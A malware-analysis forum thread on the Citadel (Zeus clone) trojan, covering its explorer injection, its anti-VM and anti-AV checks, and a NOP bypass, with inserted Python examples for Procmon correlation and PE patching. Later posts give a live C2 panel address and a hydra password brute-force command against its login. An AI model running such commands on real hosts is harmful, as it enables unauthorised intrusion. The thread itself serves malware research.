Citadel (Zeus clone)

Forum for analysis and discussion about malware.

Re: Citadel (Zeus clone)

Postby EP_X0FF » Fri Jan 04, 2013 11:10 am

Cassiel wrote:@ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.


Probably its activity is restricted by the sandbox. Why do you want to run malware in a VM + Sandboxie?
Ring0 - the source of inspiration

Re: Citadel (Zeus clone)

Postby Buster_BSA » Fri Jan 04, 2013 12:05 pm

Cassiel wrote:@ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.


Probably the malware is injecting code into a system process and then setting the autorun part from there. As Sandboxie does not allow injection into processes running outside the sandbox, the injection will fail, and so will the autorun.
Last edited by Buster_BSA on Fri Jan 04, 2013 2:33 pm, edited 1 time in total.

Re: Citadel (Zeus clone)

Postby Cassiel » Fri Jan 04, 2013 12:40 pm

@ EP_X0FF

Well, my idea was to use a VM with BSA in order to have a snapshot if things went wrong.
I tried Cuckoo also; however, I like the reporting from BSA a lot more than Cuckoo's.

@ Buster_BSA

You are most likely right. I am going to check this with procmon in order to see how the registry key is being set.


EDIT:

You are right, it is injecting into explorer and after that it is creating the autorun key.
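To show what Cassiel's procmon check looks like when automated, here is an added example (not code from the thread, nor from BSA, Sandboxie or Procmon): it reads a Process Monitor CSV export and flags Run-key values whose target executable was written by a different process than the one that set the value, which is exactly the "sample.exe drops a file, explorer.exe writes the autorun" pattern described above. The log lines, file paths and value names are constructed for the example.

```python
"""Correlate a Procmon CSV export to find autorun values set "by proxy":
the Run-key value is written by one process (e.g. explorer.exe) but the
executable it points at was dropped by another (the original sample).
All sample data below is constructed for this example."""
import csv
import io

# Any Run / RunOnce key under CurrentVersion, HKCU or HKLM (substring match).
RUN_KEY_FRAGMENT = r"\software\microsoft\windows\currentversion\run"

# Constructed Procmon export: Process Name, PID, Operation, Path, Result, Detail.
SAMPLE_CSV = """\
"Process Name","PID","Operation","Path","Result","Detail"
"sample.exe","2044","CreateFile","C:\\Users\\lab\\AppData\\Roaming\\Ezun\\piyk.exe","SUCCESS","Desired Access: Generic Write"
"sample.exe","2044","WriteFile","C:\\Users\\lab\\AppData\\Roaming\\Ezun\\piyk.exe","SUCCESS","Offset: 0, Length: 262144"
"sample.exe","2044","RegSetValue","HKCU\\Software\\Microsoft\\Ezun\\Ywyfu","SUCCESS","Type: REG_BINARY, Length: 48"
"explorer.exe","1268","RegSetValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\{F2A1B3C4-0000-4000-8000-000000000001}","SUCCESS","Type: REG_SZ, Length: 96, Data: C:\\Users\\lab\\AppData\\Roaming\\Ezun\\piyk.exe"
"notepad.exe","3100","RegSetValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Notes","SUCCESS","Type: REG_SZ, Length: 60, Data: C:\\Program Files\\Notes\\notes.exe"
"""


def is_file_write(row):
    """True for operations that put bytes on disk (WriteFile, or CreateFile opened for write)."""
    op = row["Operation"]
    return op == "WriteFile" or (op == "CreateFile" and "Generic Write" in row["Detail"])


def run_value_data(row):
    """Return the path stored in a successful Run-key RegSetValue, else None."""
    if row["Operation"] != "RegSetValue" or row["Result"] != "SUCCESS":
        return None
    if RUN_KEY_FRAGMENT not in row["Path"].lower():
        return None
    marker = "Data: "
    detail = row["Detail"]
    if marker not in detail:
        return None            # binary / non-string value, nothing to resolve
    return detail.split(marker, 1)[1].strip().strip('"')


def find_proxy_autoruns(csv_text):
    """Return findings where the Run value's target was dropped by a process
    other than the one that wrote the Run value."""
    rows = list(csv.DictReader(io.StringIO(csv_text)))

    # Pass 1: which processes wrote which files (paths normalised to lower case).
    writers = {}
    for r in rows:
        if is_file_write(r) and r["Result"] == "SUCCESS":
            writers.setdefault(r["Path"].lower(), set()).add(r["Process Name"].lower())

    # Pass 2: every Run-key write whose target was dropped by somebody else.
    findings = []
    for r in rows:
        target = run_value_data(r)
        if target is None:
            continue
        setter = r["Process Name"].lower()
        droppers = writers.get(target.lower(), set()) - {setter}
        if droppers:
            findings.append({
                "run_value": r["Path"],
                "set_by": setter,
                "target": target,
                "dropped_by": sorted(droppers),
            })
    return findings


if __name__ == "__main__":
    for f in find_proxy_autoruns(SAMPLE_CSV):
        print("%s set by %s -> %s (dropped by %s)"
              % (f["run_value"], f["set_by"], f["target"], ", ".join(f["dropped_by"])))
```

Run it against a real export with `find_proxy_autoruns(open("Logfile.CSV", encoding="utf-8-sig").read())`; Procmon's CSV export uses those six column names when the default columns are selected. The notepad.exe row is there to show that a Run value whose target was not written during the trace is not flagged.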

Re: Citadel (Zeus clone)

Postby Buster_BSA » Fri Jan 04, 2013 2:32 pm

Cassiel wrote:You are right, it is injecting into explorer and after that it is creating the autorun key.


I would like such injections to be carried out successfully so that BSA analysis can be more complete, but it depends on Sandboxie's restrictions. I am going to talk with Ronen about this and ask him if there is any workaround for the issue.

Re: Citadel (Zeus clone)

Postby bsteo » Mon Jan 21, 2013 10:10 am

Citadel 1.3.5.1 Rain Edition sample. It has some anti-VM and anti-AV functions; I couldn't run it under Comodo and didn't try manually, maybe someone will.

Re: Citadel (Zeus clone)

Postby EP_X0FF » Mon Jan 21, 2013 2:36 pm

exitthematrix wrote:Citadel 1.3.5.1 Rain Edition sample. It have some anti-VM


Not found. Except a lame trick with GetKeyboardLayoutList (patch two bytes @00418FC6 with NOPs) and another lame trick with

Code:
ROOT\SECURITYCENTERROOT\SECURITYCENTER2 SELECT * FROM%sWQL
Antivirus Product company Name display Name version Number Unknown Company:%s
Product:%s
Version:%s
Firewall Product
Software\Microsoft\Windows\CurrentVersion\Uninstall
Publisher Display Name Display Version%u:%s|%s|%s


Code:
SafenSoft SysWatch  McAfee  McAfee Security Center  McAfee SecurityCenter   Symantec Client   Symantec Protection   Symantec Shared   Symantec Security   Norton Protection   Kaspersky Security  Kaspersky Anti-Virus  avast! Antivirus  AntiVir Desktop   AVG Monitor   AVG Service   AVG Security  ESET Security   ESET Antivirus  Microsoft Inspection  Microsoft Malware   Microsoft Security


+ viewtopic.php?p=17553#p17553

Patched Zeus result (full disclosure).
http://camas.comodo.com/cgi-bin/submit? ... f9856e4263

No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.
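EP_X0FF's note about patching two bytes at 00418FC6 with NOPs only works on the file on disk once the virtual address has been mapped to a file offset through the section table. The following is an added example, not code from the thread or from any tool mentioned in it: a minimal PE32/PE32+ header walk that does the VA to RVA to raw-offset translation and writes the NOPs. The PE layout, the section geometry and the two bytes replaced (a 74 0C short conditional jump) are constructed for the example and are not taken from the Citadel sample; only the address comes from the post.

```python
"""Translate a virtual address to a file offset via the PE section table and
overwrite the bytes there with NOPs. The fake PE built below is constructed
for this example; nothing in it is from the actual sample."""
import struct

NOP = 0x90
PATCH_VA = 0x00418FC6          # address named in the post


def parse_sections(pe):
    """Return (image_base, [(VirtualAddress, VirtualSize, PointerToRawData, SizeOfRawData), ...])."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_hdr = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, file_hdr + 2)[0]
    size_opt = struct.unpack_from("<H", pe, file_hdr + 16)[0]
    opt = file_hdr + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                                   # PE32: ImageBase is a DWORD at +28
        image_base = struct.unpack_from("<I", pe, opt + 28)[0]
    elif magic == 0x20B:                                 # PE32+: ImageBase is a QWORD at +24
        image_base = struct.unpack_from("<Q", pe, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    sec = opt + size_opt                                 # first IMAGE_SECTION_HEADER (40 bytes each)
    for i in range(n_sections):
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", pe, sec + i * 40 + 8)
        sections.append((va, vsize, rawptr, rawsize))
    return image_base, sections


def va_to_offset(pe, va):
    """Map a VA (assuming the file's preferred ImageBase) to a raw file offset."""
    image_base, sections = parse_sections(pe)
    rva = va - image_base
    for sva, vsize, rawptr, rawsize in sections:
        if sva <= rva < sva + max(vsize, rawsize):
            off = rva - sva
            if off >= rawsize:
                raise ValueError("RVA 0x%x is in the uninitialised tail of its section" % rva)
            return rawptr + off
    raise ValueError("RVA 0x%x is not inside any section" % rva)


def nop_patch(pe, va, length=2):
    """Return a copy of `pe` with `length` bytes at `va` replaced by NOPs."""
    off = va_to_offset(pe, va)
    out = bytearray(pe)
    out[off:off + length] = bytes([NOP]) * length
    return bytes(out)


def build_fake_pe32(image_base=0x400000, text_va=0x1000, text_raw=0x400, text_size=0x20000):
    """Constructed minimal PE32 image with one .text section (headers only, body zeroed)."""
    pe = bytearray(text_raw + text_size)
    pe[:2] = b"MZ"
    e_lfanew = 0x40
    struct.pack_into("<I", pe, 0x3C, e_lfanew)
    pe[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    file_hdr = e_lfanew + 4
    struct.pack_into("<HH", pe, file_hdr, 0x14C, 1)      # Machine = i386, NumberOfSections = 1
    struct.pack_into("<H", pe, file_hdr + 16, 0xE0)      # SizeOfOptionalHeader (standard PE32)
    opt = file_hdr + 20
    struct.pack_into("<H", pe, opt, 0x10B)               # PE32 magic
    struct.pack_into("<I", pe, opt + 28, image_base)
    sec = opt + 0xE0
    pe[sec:sec + 8] = b".text\0\0\0"
    struct.pack_into("<IIII", pe, sec + 8, text_size, text_va, text_size, text_raw)
    return bytes(pe)


def demo():
    """Plant a constructed 'jz short' at PATCH_VA and NOP it out; returns (offset, before, after)."""
    pe = bytearray(build_fake_pe32())
    off = va_to_offset(bytes(pe), PATCH_VA)
    pe[off:off + 2] = b"\x74\x0c"                        # constructed stand-in for the check's jump
    patched = nop_patch(bytes(pe), PATCH_VA)
    return off, bytes(pe[off:off + 2]), patched[off:off + 2]


if __name__ == "__main__":
    off, before, after = demo()
    print("VA 0x%08X -> file offset 0x%X: %s -> %s" % (PATCH_VA, off, before.hex(), after.hex()))
```

For a real binary the call is `open("out.exe", "wb").write(nop_patch(open("in.exe", "rb").read(), 0x00418FC6))`; the VA from a debugger is only valid against the file's preferred ImageBase, so check that the module was not relocated before trusting the number.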

Re: Citadel (Zeus clone)

Postby bsteo » Mon Jan 21, 2013 4:46 pm

Thank you very much for the tips and help :)

Re: Citadel (Zeus clone)

Postby Xylitol » Mon Jan 21, 2013 5:08 pm

Code:
• dns: 1 ›› ip: 62.109.1.7 - address: CITAB-TEST.TK
http://62.109.1.7/net/panel.php?m=login

Code:
http://62.109.1.7/net/install/
• [0] - Connecting to MySQL as 'citab-test'.
• [0] - Selecting DB 'citab-test'.
• [0] - Updating table 'botnet_list'.
• [0] - Creating table 'botnet_reports'.
• [0] - Updating table 'botnet_reports_130119'.
• [0] - Filling table 'ipv4toc'.
• [0] - Creating table 'ipv4toc'.
• [3] - Updating table 'cp_users'.
• [3] - Updating table 'botnet_scripts'.
• [3] - Updating table 'botnet_scripts_stat'.
• [3] - Updating table 'botnet_software_stat'.
• [3] - Updating table 'exe_updates'.
• [3] - Updating table 'exe_updates_crypter'.
• [3] - Updating table 'accparse_rules'.
• [3] - Updating table 'accparse_accounts'.
• [3] - Updating table 'vnc_bot_connections'.
• [3] - Updating table 'jabber_messages'.
• [3] - Updating table 'botnet_screenshots'.
• [3] - Updating table 'botnet_rep_favorites'.
• [3] - Updating table 'botnet_activity'.
• [3] - Updating table 'botnet_webinjects_group'.
• [3] - Updating table 'botnet_webinjects_group_perms'.
• [3] - Updating table 'botnet_webinjects'.
• [3] - Updating table 'botnet_webinjects_bundle'.
• [3] - Updating table 'botnet_webinjects_bundle_execlim'.
• [3] - Updating table 'botnet_webinjects_bundle_members'.
• [3] - Updating table 'botnet_webinjects_history'.
• [3] - Creating folder '_logos'.
• [3] - Writing config file
• [3] - Searching for the god particle...
• [3] - Creating folder 'system/data'.
• [3] - Creating folder 'public'.
• [3] - Creating folder 'files'.
• [3] - Creating folder 'files/webinjects'.
-- Update complete! --

EP_X0FF wrote:No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.
Code:
-l admin -P pwd.lst -s 80 -w 64 -f -V 62.109.1.7 http-post-form "/net/panel.php?m=login:user=admin&pass=^PASS^:Bad user name or password."

And it's the same command to brute-force Zeus, Ice9 and Citadel.

Re: Citadel (Zeus clone)

Postby bsteo » Mon Jan 21, 2013 6:59 pm

If someone needs the PHP admin panel of this slavik mod shit, let me know, I can upload it.

Re: Citadel (Zeus clone)

Postby R136a1 » Sat Feb 02, 2013 10:27 am

Seems like Citadel is the new favorite toy of some criminal gangs targeting government organizations:

McAfee Blog: http://blogs.mcafee.com/mcafee-labs/lab ... del-trojan

HitmanPro Blog: https://hitmanpro.wordpress.com/2013/02 ... onnection/
